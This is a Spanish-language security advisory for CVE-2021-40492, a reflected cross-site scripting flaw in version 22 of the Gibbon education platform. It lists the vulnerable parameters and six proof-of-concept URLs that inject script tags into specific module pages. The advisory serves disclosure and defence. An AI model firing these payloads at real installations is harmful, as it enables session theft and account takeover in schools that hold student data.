
CVE-2021-40492 Gibbon versión 22 Cross Site Scripting Reflejado (XSS)
CVE-2021-40492 Vulnerabilidades de Cross Site Scripting (XSS) Reflejado en Gibbon versión 22. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40492
Existe una vulnerabilidad de Cross Site Scripting reflejado en varias páginas de la versión 22 de la aplicación educativa Gibbon que permite la ejecución arbitraria de comandos JavaScript.
Parámetros vulnerables : gibbonCourseClassID, gibbonPersonID, subpage, currentDate, allStudents
Payloads vulnerables:
/gibbonedu/index.php?q=%2Fmodules%2FFormal+Assessment%2FexternalAssessment_details.php&gibbonPersonID=0000001819d7gdw'%3e%3cscript%3ealert(1)%3c%2fscript%3eckbcl&search=&allStudents=
/gibbonedu/index.php?q=%2fmodules%2fDepartments%2fdepartment_course_class.php&gibbonCourseClassID=00002425sbh6q%22%3e%3cscript%3ealert(XSS)%3c%2fscript%3ezdb7w
/gibbonedu/index.php?q=%2Fmodules%2FFormal+Assessment%2FexternalAssessment_details.php&gibbonPersonID=0000001819&search=k7zkk'%3e%3cscript%3ealert(XSS)%3c%2fscript%3eiqdj2&allStudents=
/gibbonedu/index.php?q=%2fmodules%2fPlanner%2fplanner.php&gibbonCourseClassID=00002425%7d%7dih0ol'%3e%3cscript%3ealert(XSS)%3c%2fscript%3eadssq&viewBy=class
/gibbonedu/index.php?q=%2fmodules%2fStudents%2fstudent_view_details.php&gibbonPersonID=2033&search=&allStudents=on&sort=surname%2c%20preferredName&subpage=Familyjxlcj%3cscript%3ealert(XSS)%3c%2fscript%3emn58l
/gibbonedu/index.php?q=%2fmodules%2fDepartments%2fdepartment_course_class.php&gibbonCourseClassID=00002425¤tDate=k9q4m%22%3e%3cscript%3ealert(XSS)%3c%2fscript%3etfuh1
Encontrado el 2 de septiembre de 2021 por Brian Lowe